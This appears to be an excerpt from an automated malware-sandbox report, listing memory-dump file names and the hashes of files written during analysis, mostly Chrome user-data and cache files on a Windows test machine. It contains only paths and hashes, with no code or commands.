memory/2156-2382-0x00007FFAF8A90000-0x00007FFAF8ABD000-memory.dmp
memory/2156-2385-0x00007FFAE98A0000-0x00007FFAE9A11000-memory.dmp
memory/2156-2384-0x00007FFAF8610000-0x00007FFAF862F000-memory.dmp
memory/2156-2386-0x00007FFAF85F0000-0x00007FFAF8609000-memory.dmp
memory/2156-2389-0x00007FFAF84B0000-0x00007FFAF8568000-memory.dmp
memory/2156-2391-0x00007FFAE9A20000-0x00007FFAE9E8E000-memory.dmp
memory/2156-2392-0x000001E59EC50000-0x000001E59EFC5000-memory.dmp
memory/2156-2390-0x00007FFAE9520000-0x00007FFAE9895000-memory.dmp
memory/2156-2388-0x00007FFAF8570000-0x00007FFAF859E000-memory.dmp
memory/2156-2387-0x00007FFAFC510000-0x00007FFAFC51D000-memory.dmp
memory/2156-2394-0x00007FFAF8B80000-0x00007FFAF8B8D000-memory.dmp
memory/2156-2393-0x00007FFAF8490000-0x00007FFAF84A4000-memory.dmp
memory/2156-2398-0x00007FFAE9400000-0x00007FFAE9518000-memory.dmp
memory/2156-2397-0x00007FFAF8AC0000-0x00007FFAF8AE4000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_0va2cyqf.nit.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/5800-2408-0x000001B5A2140000-0x000001B5A2162000-memory.dmp
memory/5800-2429-0x000001B5A24A0000-0x000001B5A260A000-memory.dmp
memory/6528-2432-0x000001B2DB4F0000-0x000001B2DB65A000-memory.dmp
memory/6812-2433-0x000002277EB60000-0x000002277ECCA000-memory.dmp
memory/6920-2490-0x00000000059E0000-0x0000000005A46000-memory.dmp
memory/2156-2496-0x00007FFAF8610000-0x00007FFAF862F000-memory.dmp
memory/2156-2506-0x00007FFAF8630000-0x00007FFAF8649000-memory.dmp
memory/2156-2505-0x00007FFAE9400000-0x00007FFAE9518000-memory.dmp
memory/2156-2501-0x00007FFAF84B0000-0x00007FFAF8568000-memory.dmp
memory/2156-2500-0x00007FFAF8570000-0x00007FFAF859E000-memory.dmp
memory/2156-2498-0x00007FFAF85F0000-0x00007FFAF8609000-memory.dmp
memory/2156-2502-0x00007FFAE9520000-0x00007FFAE9895000-memory.dmp
memory/2156-2497-0x00007FFAE98A0000-0x00007FFAE9A11000-memory.dmp
memory/2156-2491-0x00007FFAE9A20000-0x00007FFAE9E8E000-memory.dmp
memory/2156-2492-0x00007FFAF8AC0000-0x00007FFAF8AE4000-memory.dmp
memory/2156-2566-0x00007FFAF8AC0000-0x00007FFAF8AE4000-memory.dmp
memory/2156-2565-0x00007FFAE9A20000-0x00007FFAE9E8E000-memory.dmp
memory/2156-2581-0x00007FFAE9A20000-0x00007FFAE9E8E000-memory.dmp
memory/2156-2600-0x00007FFAF8610000-0x00007FFAF862F000-memory.dmp
memory/2156-2609-0x00007FFAE9400000-0x00007FFAE9518000-memory.dmp
memory/2156-2608-0x00007FFAF8B80000-0x00007FFAF8B8D000-memory.dmp
memory/2156-2607-0x00007FFAF8490000-0x00007FFAF84A4000-memory.dmp
memory/2156-2606-0x00007FFAE9520000-0x00007FFAE9895000-memory.dmp
memory/2156-2605-0x00007FFAF84B0000-0x00007FFAF8568000-memory.dmp
memory/2156-2604-0x00007FFAF8570000-0x00007FFAF859E000-memory.dmp
memory/2156-2603-0x00007FFAFC510000-0x00007FFAFC51D000-memory.dmp
memory/2156-2602-0x00007FFAF85F0000-0x00007FFAF8609000-memory.dmp
memory/2156-2601-0x00007FFAE98A0000-0x00007FFAE9A11000-memory.dmp
memory/2156-2599-0x00007FFAF8A90000-0x00007FFAF8ABD000-memory.dmp
memory/2156-2598-0x00007FFAF8630000-0x00007FFAF8649000-memory.dmp
memory/2156-2597-0x00007FFAF8AC0000-0x00007FFAF8AE4000-memory.dmp
memory/2156-2596-0x00007FFAFFDC0000-0x00007FFAFFDCF000-memory.dmp
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad\settings.dat
| MD5 | 64d7569e7e9cd59b61724e5ca8024d2b |
| SHA1 | 7e567c8f3a278f528fd7d85d462cce4e56bb8e79 |
| SHA256 | 8adde9c0e5b89d0b9041d73f1c9ef531e668cdc1d020e7625e45f7063569ab1c |
| SHA512 | b4425d6dea07aaa95039db3491ace66ff0e4e64232309b2c7dfe29200823454c3f91391db09b01b83edeb298dd3a9ff1dd0198c13230763553160e5a2607efb2 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_000041
| MD5 | df14665f460474a948ef6f3ca958f319 |
| SHA1 | 78acca6b4ca9499ba20a2341060e9e62d1365a0c |
| SHA256 | e1351a972cfc2b3cee94b36da7a2d25d94e86166685a084a7f8fc1f3e578270e |
| SHA512 | 8a6bbf19d0a305b4617604e34491fea97b0d5d88b6bc7ed635daa1fd7c580fe5aaa799eaa298c949bf4cb69d8d415c0e823b6128476008e527c130a26cf59cc2 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State
| MD5 | 5e405564520f1ec62d793e961afdd0ef |
| SHA1 | 0fc382d7443aadad3e1a356e9b327ed10f2058a1 |
| SHA256 | c421915f484e8e8443cf0f05e03fc30098ec7342343cd711273c476bd4ca98e8 |
| SHA512 | 492a78bf2b33488f06b7fe53c8ca241d7d60c207c2efd3764d032b92463a7f6faec171ac891cb93c67478b285198c5005b3afcb2642b2b88aa23c21b190ac9d9 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | 63607b8caca9f58fd11e00efa006a387 |
| SHA1 | 01841198bdbb07647fa5529168e8e0f2d5a37e8a |
| SHA256 | 10942009dc29998dcaa8d022f06d878c3a06a7016df359daf1ea016df2e0dcd0 |
| SHA512 | 964c77d0983d8e2c8bf5acafe0fe86ee1bb65490d5af0c536c8fc79da0d83dd3c1e2cb5a3d3954236bc673be73e94deaa52e9cd0adaf9207ade0ec073e90657d |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity
| MD5 | 59cde4776381e8c82cf25d5517d96ce3 |
| SHA1 | 7dafd207e41d7a76c7a061438a939f2e2ae33e7a |
| SHA256 | b68b5786fe7e410e80c7ad95836a142bb90c10760c5197924b4f5288c3dc805f |
| SHA512 | 4d47333b59998e4a331b7ffa8caa2161f8b5d8a297c7216a5eca6e0a18a63db9a270cfe5774da0bf5ef20b0c3c169b4ef339298fcbc208a5ec6ee99baef14fe0 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Module Info Cache
| MD5 | f3818a50ff528efcce568c4489b7cd48 |
| SHA1 | 32848c7afee514d4d8697cd13d0dc86122120310 |
| SHA256 | ad656a0f8a3416bb35b52a98e1cfc20c45f9cd742a7f972816589f70723fcccb |
| SHA512 | 4e329006ef279ccb0eb220cb307c5a285828610ea4964816b98bd875c4dc1f35a0ceaf278a7b22ea29516832ca5063f4a0a5f5922507c726eb1f27357fa18a2c |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity
| MD5 | b76a4952d31c706cf51dd4008a7d6bd6 |
| SHA1 | c4ec996a6a90daf8c4932cf1c0e31940a54849a0 |
| SHA256 | 6b0a9b474b2259dbc46a25d289d39c39b22a85fb951d7fed9f97ca94a389d3c8 |
| SHA512 | 539e2b48a4e3c5730c6dc245d5378c60a2b1a765df11aa570475ec3c33f19a05bfe0721f324920182c52283a97a53469596560c9978b1cb3ffeb47a65282ac21 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\the-real-index
| MD5 | d356012bbc088f191588658bfcb86f92 |
| SHA1 | 89418e591e62193e3ec31651b8192896d21e5868 |
| SHA256 | 84aec6565a1789e6d196d20a7c293f19f43c9b92b74c6411cc056ad2e7964867 |
| SHA512 | f5d749c92c606b2bd31f0fee1b6fbd39b6a47df4a749b5d6d61eb1ab9039f7ab329d429135cb99b37ab5b7fbac75532631d2578fd43132f434c333e89eca6b61 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\Explorer\thumbcache_idx.db
| MD5 | 6c505d69c4be8d1ce82acc764a2e4a63 |
| SHA1 | 062ccfe23ebebd66bc25a0dc52e9ae800252501f |
| SHA256 | 9dfe5c33aa4d72093183d3b50ad39ee86faa6fab971cb4b2e09df6f30129af0f |
| SHA512 | c2e4e078402b3cc91919e4a4f39b5791a3d3d1550d1c59f0488cd409f1d6b3bc55776690173dd66bcc920eff5c3e46f0e1bb6c35ec0629eb2a148c0bf8ccd2fb |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\TransportSecurity
| MD5 | 7bf90d6b7670e22b7947b4f82fe0d1ac |
| SHA1 | 0d81f6e3293b20acd592bc278cc118513838a2b8 |
| SHA256 | a32c14c1e5f02c211cc6867b0e7df4f9e8ab37a1ab5337357721ddd90f188973 |
| SHA512 | 2372f9823faeba565f0dffdda025685bdff1b1bee3a1172cbb3e351baf7c0ef905692bb4e752aae512c83a56b59a2cf9849ddd71f5a12bd8fa6cc8041d23bb05 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State
| MD5 | d33424cbc3c1122317dd7d99189524a8 |
| SHA1 | 6f69f5ac1a488338754e442e9668eb4e681affba |
| SHA256 | f5476dc1bdde1db07f2cd24ebab71d6a35df041c9008dd961838fdde8f9d70cd |
| SHA512 | b3f1d8a4b38024c9c3cc880a2b6a446609712d9447affa7470387aeeaa788586e77b64190bdae9fdb3e49118d8d2aeccdb812b253a85cd66ef0e184e43cfa339 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State
| MD5 | bae3f76b0fe23a5741e3e958c959a544 |
| SHA1 | 57b8459e3a9c3c55a55e443cff00e41352f510ed |
| SHA256 | b5843baf9088564ea1b6f790dd1d188c18efa01fb6b7c1e3b58fc2c44d003067 |
| SHA512 | 245c9d6413fcee3071371a06bf3416a1407128ff4103c4aefa7b237139210998c79e0fa3c6888a3b15132233a2af3e45dd59803644e8c5888a2d514bed273260 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | 56c7e6bef44a6a67aea672ea52fd3bca |
| SHA1 | 07a879a3ac949c50cca336fb4be452d940c80e72 |
| SHA256 | 92bce6d8f462f8d7a1baeb10740e14306563ef5eaa6b1c35b6b72b187e69b5dd |
| SHA512 | 7c8bf1aa88f8bcb113ec6af81ab2b532e2b3e4f22c893f1fce2430768cef0d805013968de29936425085c69c87eea16d9a02e89acb7c1681a6639cbf6f86966f |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State
| MD5 | 4a8727114120ed81908e3d53f1307fa3 |
| SHA1 | 3a69084b5ddf9cd81fd5e968fbc1558886c873ae |
| SHA256 | 0093dec7665352fb9742bed2205f0292ecad98e11cd2df66771df1b4c0d0fed5 |
| SHA512 | 9e46b67826ba9c882859624fa52f333c24d0ad872ed7f1604d77e89f0d9b814127c604defa740b7254a62924da103ae4300614119e3eb7816120fcadc1435343 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\GPUCache\data_1
| MD5 | f9e213e6075bf5e299d53f15c760bec0 |
| SHA1 | f3e521331421019a8f47dcf6c75079f605511ca9 |
| SHA256 | 2679808cbd17977930802dbd457016b472f8cf5b3af67c524fa87a6fded93584 |
| SHA512 | e3539837aace3da31e2db49b1e16e0f6eac507c974f778a20501669cc624f41f6d907eb4ee92a6cca20eee86dc85b1bb6408b7bc6c986ff098236dd584466dba |